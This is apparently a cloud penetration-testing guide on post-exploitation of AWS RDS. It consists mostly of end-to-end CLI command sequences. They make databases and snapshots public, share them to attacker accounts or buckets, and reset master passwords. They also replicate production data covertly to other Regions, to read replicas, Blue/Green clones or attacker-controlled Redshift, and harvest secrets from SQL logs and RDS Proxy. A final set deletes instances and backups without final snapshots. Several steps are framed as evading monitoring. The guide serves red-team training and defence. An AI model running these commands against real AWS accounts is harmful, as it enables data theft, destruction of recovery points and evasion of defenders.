AWS - RDS Post Exploitation
RDS
For more information check:
AWS - Relational Database (RDS) Enum
rds:CreateDBSnapshot, rds:RestoreDBInstanceFromDBSnapshot, rds:ModifyDBInstance
If an attacker has enough permissions, he could make a DB publicly accessible by creating a snapshot of the DB, and then restoring a publicly accessible DB from that snapshot.
aws rds describe-db-instances # Get DB identifier
aws rds create-db-snapshot \
--db-instance-identifier <db-id> \
--db-snapshot-identifier cloudgoat
# Get subnet groups & security groups
aws rds describe-db-subnet-groups
aws ec2 describe-security-groups
aws rds restore-db-instance-from-db-snapshot \
--db-instance-identifier "new-db-not-malicious" \
--db-snapshot-identifier <snapshotId> \
--db-subnet-group-name <db subnet group> \
--publicly-accessible \
--vpc-security-group-ids <ec2-security group>
aws rds modify-db-instance \
--db-instance-identifier "new-db-not-malicious" \
--master-user-password 'Llaody2f6.123' \
--apply-immediately
# Connect to the new DB after a few mins
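To locate the endpoint of the restored instance and connect, a minimal sketch (assuming a MySQL-family engine and the original master username) could be:
# Get the endpoint of the restored instance created above
aws rds describe-db-instances \
--db-instance-identifier "new-db-not-malicious" \
--query 'DBInstances[0].Endpoint.[Address,Port]' --output text
# Connect with the original master username and the password set via modify-db-instance
mysql -h <endpoint> -P 3306 -u <master-username> -p'Llaody2f6.123'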
rds:StopDBCluster & rds:StopDBInstance
An attacker with rds:StopDBCluster or rds:StopDBInstance can force an immediate stop of an RDS instance or an entire cluster, making the database unavailable, breaking connections and halting processes that depend on the database.
To stop a single DB instance (example):
aws rds stop-db-instance \
--db-instance-identifier <DB_INSTANCE_IDENTIFIER>
To stop an entire DB cluster (example):
aws rds stop-db-cluster \
--db-cluster-identifier <DB_CLUSTER_IDENTIFIER>
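To confirm the outage, a minimal sketch is to poll the status until it reports stopping/stopped:
aws rds describe-db-instances \
--db-instance-identifier <DB_INSTANCE_IDENTIFIER> \
--query 'DBInstances[0].DBInstanceStatus' --output text
aws rds describe-db-clusters \
--db-cluster-identifier <DB_CLUSTER_IDENTIFIER> \
--query 'DBClusters[0].Status' --output text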
rds:Delete*
An attacker granted rds:Delete* can remove RDS resources, including deleting DB instances, clusters, snapshots, automated backups, subnet groups, parameter/option groups and related artifacts, causing immediate service outage, data loss, destruction of recovery points and loss of forensic evidence.
# Delete a DB instance (creates a final snapshot unless you skip it)
aws rds delete-db-instance \
--db-instance-identifier <DB_INSTANCE_ID> \
--final-db-snapshot-identifier <FINAL_SNAPSHOT_ID> # omit or replace with --skip-final-snapshot to avoid snapshot
# Delete a DB instance and skip final snapshot (more destructive)
aws rds delete-db-instance \
--db-instance-identifier <DB_INSTANCE_ID> \
--skip-final-snapshot
# Delete a manual DB snapshot
aws rds delete-db-snapshot \
--db-snapshot-identifier <DB_SNAPSHOT_ID>
# Delete an Aurora DB cluster (creates a final snapshot unless you skip)
aws rds delete-db-cluster \
--db-cluster-identifier <DB_CLUSTER_ID> \
--final-db-snapshot-identifier <FINAL_CLUSTER_SNAPSHOT_ID> # or use --skip-final-snapshot
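The same permission family also covers the other artifacts mentioned above; a few examples (sketch, resource identifiers are placeholders):
# Delete a retained automated backup (destroys point-in-time recovery data)
aws rds delete-db-instance-automated-backup --dbi-resource-id <DBI_RESOURCE_ID>
# Delete an Aurora cluster snapshot
aws rds delete-db-cluster-snapshot --db-cluster-snapshot-identifier <CLUSTER_SNAPSHOT_ID>
# Delete supporting configuration resources
aws rds delete-db-subnet-group --db-subnet-group-name <SUBNET_GROUP>
aws rds delete-db-parameter-group --db-parameter-group-name <PARAMETER_GROUP>
aws rds delete-db-option-group --option-group-name <OPTION_GROUP>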
rds:ModifyDBSnapshotAttribute, rds:CreateDBSnapshot
An attacker with these permissions could create a snapshot of a DB and make it publicly available. Then, he could create a DB inside his own account from that snapshot.
If the attacker doesn't have rds:CreateDBSnapshot, he could still make other already created snapshots public.
# create snapshot
aws rds create-db-snapshot --db-instance-identifier <db-instance-identifier> --db-snapshot-identifier <snapshot-name>
# Make it public/share with attackers account
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}
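From the attacker account, the shared/public snapshot can then be located and restored into a new instance; a minimal sketch (an encrypted snapshot would additionally require access to its KMS key, typically by copying it first):
# Run with attacker credentials
aws rds describe-db-snapshots --include-shared --include-public \
--query 'DBSnapshots[*].[DBSnapshotIdentifier,DBSnapshotArn,Encrypted]' --output table
# Restore using the full ARN of the shared snapshot
aws rds restore-db-instance-from-db-snapshot \
--db-instance-identifier stolen-db \
--db-snapshot-identifier <SHARED_SNAPSHOT_ARN> \
--publicly-accessible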
rds:DownloadDBLogFilePortion
An attacker with the rds:DownloadDBLogFilePortion permission can download portions of an RDS instance's log files. If sensitive data or access credentials are accidentally written to the log files, the attacker could potentially use this information to escalate privileges or perform unauthorized actions.
aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text
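To enumerate all downloadable log files and dump each one, a minimal sketch (log file names differ per engine):
for LOG in $(aws rds describe-db-log-files --db-instance-identifier target-instance \
--query 'DescribeDBLogFiles[].LogFileName' --output text); do
aws rds download-db-log-file-portion --db-instance-identifier target-instance \
--log-file-name "$LOG" --starting-token 0 --output text >> rds-logs.txt
done
grep -Ei 'password|secret|token' rds-logs.txt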
Potential Impact: Access to sensitive information or unauthorized actions using leaked credentials.
rds:DeleteDBInstance
An attacker with these permissions could perform a DoS against existing RDS instances.
# Delete
aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot
Potential Impact: Deletion of existing RDS instances, and potential loss of data.
rds:StartExportTask
note
TODO: Test this
An attacker with this permission can export an RDS instance snapshot to an S3 bucket. If the attacker controls the destination S3 bucket, he can potentially access sensitive data inside the exported snapshot.
aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id
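Progress of the export can then be monitored and the resulting data listed in the attacker bucket; a minimal sketch (exports are written under a prefix named after the export task):
aws rds describe-export-tasks --export-task-identifier attacker-export-task \
--query 'ExportTasks[0].[Status,PercentProgress]' --output text
# Once COMPLETE, list the exported Parquet data
aws s3 ls s3://attacker-bucket/attacker-export-task/ --recursive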
Potential Impact: Access to sensitive data in the exported snapshot.
Cross-Region Automated Backups replication with covert restore (rds:StartDBInstanceAutomatedBackupsReplication)
Abuse cross-Region automated backups replication to silently copy an RDS instance's automated backups to another AWS Region and restore them there. The attacker can then make the restored DB publicly accessible and reset the master password to access the data out-of-band in a Region that defenders are not monitoring.
Permissions needed (minimum):
- rds:StartDBInstanceAutomatedBackupsReplication in the destination Region
- rds:DescribeDBInstanceAutomatedBackups in the destination Region
- rds:RestoreDBInstanceToPointInTime in the destination Region
- rds:ModifyDBInstance in the destination Region
- rds:StopDBInstanceAutomatedBackupsReplication (optional cleanup)
- ec2:CreateSecurityGroup, ec2:AuthorizeSecurityGroupIngress (to expose the restored DB)
Impact: Persistence and data exfiltration by restoring a copy of production data in another Region and exposing it publicly with attacker-controlled credentials.
End-to-end CLI (replace placeholders)
# 1) Recon (SOURCE region A)
aws rds describe-db-instances \
--region <SOURCE_REGION> \
--query 'DBInstances[*].[DBInstanceIdentifier,DBInstanceArn,Engine,DBInstanceStatus,PreferredBackupWindow]' \
--output table
# 2) Start cross-Region automated backups replication (run in DEST region B)
aws rds start-db-instance-automated-backups-replication \
--region <DEST_REGION> \
--source-db-instance-arn <SOURCE_DB_INSTANCE_ARN> \
--source-region <SOURCE_REGION> \
--backup-retention-period 7
# 3) Wait for replication to be ready in DEST
aws rds describe-db-instance-automated-backups \
--region <DEST_REGION> \
--query 'DBInstanceAutomatedBackups[*].[DBInstanceAutomatedBackupsArn,DBInstanceIdentifier,Status]' \
--output table
# Proceed when Status is "replicating" or "active" and note the DBInstanceAutomatedBackupsArn
# 4) Restore to latest restorable time in DEST
aws rds restore-db-instance-to-point-in-time \
--region <DEST_REGION> \
--source-db-instance-automated-backups-arn <AUTO_BACKUP_ARN> \
--target-db-instance-identifier <TARGET_DB_ID> \
--use-latest-restorable-time \
--db-instance-class db.t3.micro
aws rds wait db-instance-available --region <DEST_REGION> --db-instance-identifier <TARGET_DB_ID>
# 5) Make public and reset credentials in DEST
# 5a) Create/choose an open SG permitting TCP/3306 (adjust engine/port as needed)
OPEN_SG_ID=$(aws ec2 create-security-group --region <DEST_REGION> \
--group-name open-rds-<RAND> --description open --vpc-id <DEST_VPC_ID> \
--query GroupId --output text)
aws ec2 authorize-security-group-ingress --region <DEST_REGION> \
--group-id "$OPEN_SG_ID" \
--ip-permissions IpProtocol=tcp,FromPort=3306,ToPort=3306,IpRanges='[{CidrIp=0.0.0.0/0}]'
# 5b) Publicly expose restored DB and attach the SG
aws rds modify-db-instance --region <DEST_REGION> \
--db-instance-identifier <TARGET_DB_ID> \
--publicly-accessible \
--vpc-security-group-ids "$OPEN_SG_ID" \
--apply-immediately
aws rds wait db-instance-available --region <DEST_REGION> --db-instance-identifier <TARGET_DB_ID>
# 5c) Reset the master password
aws rds modify-db-instance --region <DEST_REGION> \
--db-instance-identifier <TARGET_DB_ID> \
--master-user-password '<NEW_STRONG_PASSWORD>' \
--apply-immediately
aws rds wait db-instance-available --region <DEST_REGION> --db-instance-identifier <TARGET_DB_ID>
# 6) Connect to <TARGET_DB_ID> endpoint and validate data (example for MySQL)
ENDPOINT=$(aws rds describe-db-instances --region <DEST_REGION> \
--db-instance-identifier <TARGET_DB_ID> \
--query 'DBInstances[0].Endpoint.Address' --output text)
mysql -h "$ENDPOINT" -u <MASTER_USERNAME> -p'<NEW_STRONG_PASSWORD>' -e 'SHOW DATABASES;'
# 7) Optional: stop replication
aws rds stop-db-instance-automated-backups-replication \
--region <DEST_REGION> \
--source-db-instance-arn <SOURCE_DB_INSTANCE_ARN>
Enable full SQL logging via DB parameter groups and exfiltrate via the RDS log APIs
Abuse rds:ModifyDBParameterGroup together with the RDS log download APIs to capture every SQL statement executed by applications (no DB engine credentials required). Enable engine SQL logging and download the file logs via rds:DescribeDBLogFiles and rds:DownloadDBLogFilePortion (or the REST downloadCompleteLogFile). Useful to harvest queries that may contain secrets/PII/JWTs.
Permissions needed (minimum):
- rds:DescribeDBInstances, rds:DescribeDBLogFiles, rds:DownloadDBLogFilePortion
- rds:CreateDBParameterGroup, rds:ModifyDBParameterGroup
- rds:ModifyDBInstance (only to attach a custom parameter group if the instance is using the default one)
- rds:RebootDBInstance (for parameters requiring reboot, e.g., PostgreSQL)
Steps
- Recon target and current parameter group
aws rds describe-db-instances \
--query 'DBInstances[*].[DBInstanceIdentifier,Engine,DBParameterGroups[0].DBParameterGroupName]' \
--output table
- Ensure a custom DB parameter group is attached (the default one cannot be edited)
- If the instance already uses a custom group, reuse its name in the next step.
- Otherwise, create and attach one matching the engine family:
# Example for PostgreSQL 16
aws rds create-db-parameter-group \
--db-parameter-group-name ht-logs-pg \
--db-parameter-group-family postgres16 \
--description "HT logging"
aws rds modify-db-instance \
--db-instance-identifier <DB> \
--db-parameter-group-name ht-logs-pg \
--apply-immediately
# Wait until status becomes "available"
- Enable verbose SQL logging
- MySQL engines (immediate / no reboot):
aws rds modify-db-parameter-group \
--db-parameter-group-name <PGNAME> \
--parameters \
"ParameterName=general_log,ParameterValue=1,ApplyMethod=immediate" \
"ParameterName=log_output,ParameterValue=FILE,ApplyMethod=immediate"
# Optional extras:
# "ParameterName=slow_query_log,ParameterValue=1,ApplyMethod=immediate" \
# "ParameterName=long_query_time,ParameterValue=0,ApplyMethod=immediate"
- PostgreSQL engines (requires a reboot):
aws rds modify-db-parameter-group \
--db-parameter-group-name <PGNAME> \
--parameters \
"ParameterName=log_statement,ParameterValue=all,ApplyMethod=pending-reboot"
# Optional to log duration for every statement:
# "ParameterName=log_min_duration_statement,ParameterValue=0,ApplyMethod=pending-reboot"
# Reboot if any parameter is pending-reboot
aws rds reboot-db-instance --db-instance-identifier <DB>
- Let the workload run (or generate queries). Statements will be written to the engine file logs
- MySQL: general/mysql-general.log
- PostgreSQL: postgresql.log
- Discover and download the logs (no DB creds required)
aws rds describe-db-log-files --db-instance-identifier <DB>
# Pull full file via portions (iterate until AdditionalDataPending=false). For small logs a single call is enough:
aws rds download-db-log-file-portion \
--db-instance-identifier <DB> \
--log-file-name general/mysql-general.log \
--starting-token 0 \
--output text > dump.log
- Grep offline for sensitive data
grep -Ei "password=|aws_access_key_id|secret|authorization:|bearer" dump.log | sed 's/\(aws_access_key_id=\)[A-Z0-9]*/\1AKIA.../; s/\(secret=\).*/\1REDACTED/; s/\(Bearer \).*/\1REDACTED/' | head
Example evidence (redacted):
2025-10-06T..Z 13 Query INSERT INTO t(note) VALUES ('user=alice password=Sup3rS3cret!')
2025-10-06T..Z 13 Query INSERT INTO t(note) VALUES ('authorization: Bearer REDACTED')
2025-10-06T..Z 13 Query INSERT INTO t(note) VALUES ('aws_access_key_id=AKIA... secret=REDACTED')
Cleanup
- Revert the parameters to their defaults and reboot if required:
# MySQL
aws rds modify-db-parameter-group \
--db-parameter-group-name <PGNAME> \
--parameters \
"ParameterName=general_log,ParameterValue=0,ApplyMethod=immediate"
# PostgreSQL
aws rds modify-db-parameter-group \
--db-parameter-group-name <PGNAME> \
--parameters \
"ParameterName=log_statement,ParameterValue=none,ApplyMethod=pending-reboot"
# Reboot if pending-reboot
Impact: Post-exploitation data access by capturing all application SQL statements via AWS APIs (no DB creds), potentially leaking secrets, JWTs and PII.
rds:CreateDBInstanceReadReplica, rds:ModifyDBInstance
Abuse RDS read replicas to get out-of-band read access without touching the primary instance credentials. An attacker can create a read replica from a production instance, reset the replica's master password (this does not change the primary), and optionally expose the replica publicly to exfiltrate data.
Permissions needed (minimum):
- rds:DescribeDBInstances
- rds:CreateDBInstanceReadReplica
- rds:ModifyDBInstance
- ec2:CreateSecurityGroup, ec2:AuthorizeSecurityGroupIngress (if exposing publicly)
Impact: Read-only access to production data through a replica with attacker-controlled credentials; low chance of detection since the primary stays untouched and replication keeps running.
# 1) Recon: find non-Aurora sources with backups enabled
aws rds describe-db-instances \
--query 'DBInstances[*].[DBInstanceIdentifier,Engine,DBInstanceArn,DBSubnetGroup.DBSubnetGroupName,VpcSecurityGroups[0].VpcSecurityGroupId,PubliclyAccessible]' \
--output table
# 2) Create a permissive SG (replace <VPC_ID> and <YOUR_IP/32>)
aws ec2 create-security-group --group-name rds-repl-exfil --description 'RDS replica exfil' --vpc-id <VPC_ID> --query GroupId --output text
aws ec2 authorize-security-group-ingress --group-id <SGID> --ip-permissions '[{"IpProtocol":"tcp","FromPort":3306,"ToPort":3306,"IpRanges":[{"CidrIp":"<YOUR_IP/32>","Description":"tester"}]}]'
# 3) Create the read replica (optionally public)
aws rds create-db-instance-read-replica \
--db-instance-identifier <REPL_ID> \
--source-db-instance-identifier <SOURCE_DB> \
--db-instance-class db.t3.medium \
--publicly-accessible \
--vpc-security-group-ids <SGID>
aws rds wait db-instance-available --db-instance-identifier <REPL_ID>
# 4) Reset ONLY the replica master password (primary unchanged)
aws rds modify-db-instance --db-instance-identifier <REPL_ID> --master-user-password 'NewStr0ng!Passw0rd' --apply-immediately
aws rds wait db-instance-available --db-instance-identifier <REPL_ID>
# 5) Connect and dump (use the SOURCE master username + NEW password)
REPL_ENDPOINT=$(aws rds describe-db-instances --db-instance-identifier <REPL_ID> --query 'DBInstances[0].Endpoint.Address' --output text)
# e.g., with mysql client: mysql -h "$REPL_ENDPOINT" -u <MASTER_USERNAME> -p'NewStr0ng!Passw0rd' -e 'SHOW DATABASES; SELECT @@read_only, CURRENT_USER();'
# Optional: promote for persistence
# aws rds promote-read-replica --db-instance-identifier <REPL_ID>
Example evidence (MySQL):
- Replica DB status: available, read replication: replicating
- Successful connection with the new password and @@read_only=1, confirming read-only replica access.
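Cleanup (a minimal sketch, assuming the lab resources created above):
aws rds delete-db-instance --db-instance-identifier <REPL_ID> --skip-final-snapshot
aws rds wait db-instance-deleted --db-instance-identifier <REPL_ID>
aws ec2 delete-security-group --group-id <SGID>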
rds:CreateBlueGreenDeployment, rds:ModifyDBInstance
Abuse RDS Blue/Green deployments to clone a production DB into a continuously replicating, read-only green environment. Then reset the green environment's master credentials to access the data without touching the blue (prod) instance. This is stealthier than snapshot sharing and often bypasses monitoring that only watches the source.
# 1) Recon - find eligible source (non-Aurora MySQL/PostgreSQL in the same account)
aws rds describe-db-instances \
--query 'DBInstances[*].[DBInstanceIdentifier,DBInstanceArn,Engine,EngineVersion,DBSubnetGroup.DBSubnetGroupName,PubliclyAccessible]'
# Ensure: automated backups enabled on source (BackupRetentionPeriod > 0), no RDS Proxy, supported engine/version
# 2) Create Blue/Green deployment (replicates blue->green continuously)
aws rds create-blue-green-deployment \
--blue-green-deployment-name ht-bgd-attack \
--source <BLUE_DB_ARN>
# Optional to upgrade: --target-engine-version <same-or-higher-compatible>
# Wait until deployment Status becomes AVAILABLE, then note the green DB id
aws rds describe-blue-green-deployments \
--blue-green-deployment-identifier <BGD_ID> \
--query 'BlueGreenDeployments[0].SwitchoverDetails[0].TargetMember'
# Typical green id: <blue>-green-XXXX
# 3) Reset the green master password (does not affect blue)
aws rds modify-db-instance \
--db-instance-identifier <GREEN_DB_ID> \
--master-user-password 'Gr33n!Exfil#1' \
--apply-immediately
# Optional: expose the green for direct access (attach an SG that allows the DB port)
aws rds modify-db-instance \
--db-instance-identifier <GREEN_DB_ID> \
--publicly-accessible \
--vpc-security-group-ids <SG_ALLOWING_DB_PORT> \
--apply-immediately
# 4) Connect to the green endpoint and query/exfiltrate (green is read-only)
aws rds describe-db-instances \
--db-instance-identifier <GREEN_DB_ID> \
--query 'DBInstances[0].Endpoint.Address' --output text
# Then connect with the master username and the new password and run SELECT/dumps
# e.g. MySQL: mysql -h <endpoint> -u <master_user> -p'Gr33n!Exfil#1'
# 5) Cleanup - remove blue/green and the green resources
aws rds delete-blue-green-deployment \
--blue-green-deployment-identifier <BGD_ID> \
--delete-target
Impact: Read-only but full data access to a near-real-time clone of production without modifying the production instance. Useful for stealthy data theft and offline analysis.
Out-of-band SQL via the RDS Data API by enabling the HTTP endpoint + resetting the master password
Abuse Aurora to enable the RDS Data API HTTP endpoint on a target cluster, reset the master password to a value you control, and run SQL over HTTPS (no VPC network path required). Works on Aurora engines that support the Data API/EnableHttpEndpoint (e.g., Aurora MySQL 8.0 provisioned; some Aurora PostgreSQL/MySQL versions).
Permissions (minimum):
- rds:DescribeDBClusters, rds:ModifyDBCluster (or rds:EnableHttpEndpoint)
- secretsmanager:CreateSecret
- rds-data:ExecuteStatement (and rds-data:BatchExecuteStatement if used)
Impact: Bypass of network segmentation and data exfiltration via AWS APIs without any direct VPC connectivity to the DB.
End-to-end CLI (Aurora MySQL example)
# 1) Identify target cluster ARN
REGION=us-east-1
CLUSTER_ID=<target-cluster-id>
CLUSTER_ARN=$(aws rds describe-db-clusters --region $REGION \
--db-cluster-identifier $CLUSTER_ID \
--query 'DBClusters[0].DBClusterArn' --output text)
# 2) Enable Data API HTTP endpoint on the cluster
# Either of the following (depending on API/engine support):
aws rds enable-http-endpoint --region $REGION --resource-arn "$CLUSTER_ARN"
# or
aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
--enable-http-endpoint --apply-immediately
# Wait until HttpEndpointEnabled is True
aws rds wait db-cluster-available --region $REGION --db-cluster-identifier $CLUSTER_ID
aws rds describe-db-clusters --region $REGION --db-cluster-identifier $CLUSTER_ID \
--query 'DBClusters[0].HttpEndpointEnabled' --output text
# 3) Reset master password to attacker-controlled value
aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
--master-user-password 'Sup3rStr0ng!1' --apply-immediately
# Wait until pending password change is applied
while :; do
aws rds wait db-cluster-available --region $REGION --db-cluster-identifier $CLUSTER_ID
P=$(aws rds describe-db-clusters --region $REGION --db-cluster-identifier $CLUSTER_ID \
--query 'DBClusters[0].PendingModifiedValues.MasterUserPassword' --output text)
[[ "$P" == "None" || "$P" == "null" ]] && break
sleep 10
done
# 4) Create a Secrets Manager secret for Data API auth
SECRET_ARN=$(aws secretsmanager create-secret --region $REGION --name rdsdata/demo-$CLUSTER_ID \
--secret-string '{"username":"admin","password":"Sup3rStr0ng!1"}' \
--query ARN --output text)
# 5) Prove out-of-band SQL via HTTPS using rds-data
# (Example with Aurora MySQL; for PostgreSQL, adjust SQL and username accordingly)
aws rds-data execute-statement --region $REGION --resource-arn "$CLUSTER_ARN" \
--secret-arn "$SECRET_ARN" --database mysql --sql "create database if not exists demo;"
aws rds-data execute-statement --region $REGION --resource-arn "$CLUSTER_ARN" \
--secret-arn "$SECRET_ARN" --database demo --sql "create table if not exists pii(note text);"
aws rds-data execute-statement --region $REGION --resource-arn "$CLUSTER_ARN" \
--secret-arn "$SECRET_ARN" --database demo --sql "insert into pii(note) values ('token=SECRET_JWT');"
aws rds-data execute-statement --region $REGION --resource-arn "$CLUSTER_ARN" \
--secret-arn "$SECRET_ARN" --database demo --sql "select current_user(), now(), (select count(*) from pii) as row_count;" \
--format-records-as JSON
Notes:
- If multi-statement SQL is rejected by rds-data, send a separate execute-statement per statement.
- On engines where modify-db-cluster --enable-http-endpoint has no effect, use rds enable-http-endpoint --resource-arn instead.
- Make sure the engine/version supports the Data API; otherwise HttpEndpointEnabled will stay False.
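Cleanup (a minimal sketch): disable the HTTP endpoint and remove the helper secret once done:
aws rds disable-http-endpoint --region $REGION --resource-arn "$CLUSTER_ARN"
# or: aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID --no-enable-http-endpoint --apply-immediately
aws secretsmanager delete-secret --region $REGION --secret-id "$SECRET_ARN" --force-delete-without-recovery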
Harvest DB credentials via RDS Proxy auth secrets (rds:DescribeDBProxies + secretsmanager:GetSecretValue)
Abuse RDS Proxy configuration to discover the Secrets Manager secret used for backend authentication, then read that secret to obtain the database credentials. Many environments grant broad secretsmanager:GetSecretValue, making this a quick path to DB creds. If the secret uses a CMK, loosely scoped KMS permissions may also allow kms:Decrypt.
Permissions needed (minimum):
- rds:DescribeDBProxies
- secretsmanager:GetSecretValue on the referenced SecretArn
- Optional, if the secret uses a CMK: kms:Decrypt on that key
Impact: Immediate disclosure of the DB username/password configured on the proxy; enables direct DB access or further lateral movement.
Steps
# 1) Enumerate proxies and extract the SecretArn used for auth
aws rds describe-db-proxies \
--query DBProxies[*].[DBProxyName,Auth[0].AuthScheme,Auth[0].SecretArn] \
--output table
# 2) Read the secret value (common over-permission)
aws secretsmanager get-secret-value \
--secret-id <SecretArnFromProxy> \
--query SecretString --output text
# Example output: {"username":"admin","password":"S3cr3t!"}
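With the recovered credentials, a minimal sketch is to connect through the proxy endpoint itself (requires network reachability to the proxy, which is VPC-internal by default):
aws rds describe-db-proxies --db-proxy-name <DBProxyName> \
--query 'DBProxies[0].Endpoint' --output text
# e.g. MySQL engine family: mysql -h <proxy-endpoint> -u admin -p'S3cr3t!'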
Lab (minimal setup to reproduce)
REGION=us-east-1
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
SECRET_ARN=$(aws secretsmanager create-secret \
--region $REGION --name rds/proxy/aurora-demo \
--secret-string '{"username":"admin","password":"S3cr3t!"}' \
--query ARN --output text)
aws iam create-role --role-name rds-proxy-secret-role \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"rds.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
aws iam attach-role-policy --role-name rds-proxy-secret-role \
--policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite
aws rds create-db-proxy --db-proxy-name p0 --engine-family MYSQL \
--auth "AuthScheme=SECRETS,SecretArn=$SECRET_ARN" \
--role-arn arn:aws:iam::$ACCOUNT_ID:role/rds-proxy-secret-role \
--vpc-subnet-ids $(aws ec2 describe-subnets --filters Name=default-for-az,Values=true --query Subnets[].SubnetId --output text)
aws rds wait db-proxy-available --db-proxy-name p0
# Now run the enumeration + secret read from the Steps above
Cleanup (lab)
aws rds delete-db-proxy --db-proxy-name p0
aws iam detach-role-policy --role-name rds-proxy-secret-role --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite
aws iam delete-role --role-name rds-proxy-secret-role
aws secretsmanager delete-secret --secret-id rds/proxy/aurora-demo --force-delete-without-recovery
Stealthy continuous exfiltration via Aurora zero-ETL to Amazon Redshift (rds:CreateIntegration)
Abuse an Aurora PostgreSQL zero-ETL integration to continuously replicate production data into an attacker-controlled Redshift Serverless namespace. With a permissive Redshift resource policy allowing CreateInboundIntegration/AuthorizeInboundIntegration for a specific Aurora cluster ARN, an attacker can establish a near real-time copy of the data without DB creds, snapshots or network exposure.
Permissions needed (minimum):
- rds:CreateIntegration, rds:DescribeIntegrations, rds:DeleteIntegration
- redshift:PutResourcePolicy, redshift:DescribeInboundIntegrations, redshift:DescribeIntegrations
- redshift-data:ExecuteStatement / GetStatementResult / ListDatabases (to query)
- rds-data:ExecuteStatement (optional; to seed data if needed)
Tested on: us-east-1, Aurora PostgreSQL 16.4 (Serverless v2), Redshift Serverless.
1) Create a Redshift Serverless namespace + workgroup
REGION=us-east-1
RS_NS_ARN=$(aws redshift-serverless create-namespace --region $REGION --namespace-name ztl-ns \
--admin-username adminuser --admin-user-password 'AdminPwd-1!' \
--query namespace.namespaceArn --output text)
RS_WG_ARN=$(aws redshift-serverless create-workgroup --region $REGION --workgroup-name ztl-wg \
--namespace-name ztl-ns --base-capacity 8 --publicly-accessible \
--query workgroup.workgroupArn --output text)
# Wait until AVAILABLE, then enable case sensitivity (required for PostgreSQL)
aws redshift-serverless update-workgroup --region $REGION --workgroup-name ztl-wg \
--config-parameters parameterKey=enable_case_sensitive_identifier,parameterValue=true
2) Configure the Redshift resource policy to allow the Aurora source
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
SRC_ARN=<AURORA_CLUSTER_ARN>
cat > rs-rp.json <<JSON
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AuthorizeInboundByRedshiftService",
"Effect": "Allow",
"Principal": {"Service": "redshift.amazonaws.com"},
"Action": "redshift:AuthorizeInboundIntegration",
"Resource": "$RS_NS_ARN",
"Condition": {"StringEquals": {"aws:SourceArn": "$SRC_ARN"}}
},
{
"Sid": "AllowCreateInboundFromAccount",
"Effect": "Allow",
"Principal": {"AWS": "arn:aws:iam::$ACCOUNT_ID:root"},
"Action": "redshift:CreateInboundIntegration",
"Resource": "$RS_NS_ARN"
}
]
}
JSON
aws redshift put-resource-policy --region $REGION --resource-arn "$RS_NS_ARN" --policy file://rs-rp.json
3) Create the Aurora PostgreSQL cluster (enable the Data API and logical replication)
CLUSTER_ID=aurora-ztl
aws rds create-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
--engine aurora-postgresql --engine-version 16.4 \
--master-username postgres --master-user-password 'InitPwd-1!' \
--enable-http-endpoint --no-deletion-protection --backup-retention-period 1
aws rds wait db-cluster-available --region $REGION --db-cluster-identifier $CLUSTER_ID
# Serverless v2 instance
aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
--serverless-v2-scaling-configuration MinCapacity=0.5,MaxCapacity=1 --apply-immediately
aws rds create-db-instance --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1 \
--db-instance-class db.serverless --engine aurora-postgresql --db-cluster-identifier $CLUSTER_ID
aws rds wait db-instance-available --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1
# Cluster parameter group for zero-ETL
aws rds create-db-cluster-parameter-group --region $REGION --db-cluster-parameter-group-name apg16-ztl-zerodg \
--db-parameter-group-family aurora-postgresql16 --description "APG16 zero-ETL params"
aws rds modify-db-cluster-parameter-group --region $REGION --db-cluster-parameter-group-name apg16-ztl-zerodg --parameters \
ParameterName=rds.logical_replication,ParameterValue=1,ApplyMethod=pending-reboot \
ParameterName=aurora.enhanced_logical_replication,ParameterValue=1,ApplyMethod=pending-reboot \
ParameterName=aurora.logical_replication_backup,ParameterValue=0,ApplyMethod=pending-reboot \
ParameterName=aurora.logical_replication_globaldb,ParameterValue=0,ApplyMethod=pending-reboot
aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
--db-cluster-parameter-group-name apg16-ztl-zerodg --apply-immediately
aws rds reboot-db-instance --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1
aws rds wait db-instance-available --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1
SRC_ARN=$(aws rds describe-db-clusters --region $REGION --db-cluster-identifier $CLUSTER_ID --query 'DBClusters[0].DBClusterArn' --output text)
4) Create the zero-ETL integration from RDS
# Include all tables in the default 'postgres' database
aws rds create-integration --region $REGION --source-arn "$SRC_ARN" \
--target-arn "$RS_NS_ARN" --integration-name ztl-demo \
--data-filter 'include: postgres.*.*'
# Redshift inbound integration should become ACTIVE
aws redshift describe-inbound-integrations --region $REGION --target-arn "$RS_NS_ARN"
5) Map and query the replicated data in Redshift
# Create a Redshift database from the inbound integration (use integration_id from SVV_INTEGRATION)
aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database dev \
--sql "select integration_id from svv_integration" # take the GUID value
aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database dev \
--sql "create database ztl_db from integration '<integration_id>' database postgres"
# List tables replicated
aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database ztl_db \
--sql "select table_schema,table_name from information_schema.tables where table_schema not in ('pg_catalog','information_schema') order by 1,2 limit 20;"
Evidence observed during testing:
- redshift describe-inbound-integrations: Status ACTIVE for Integration arn:...377a462b-...
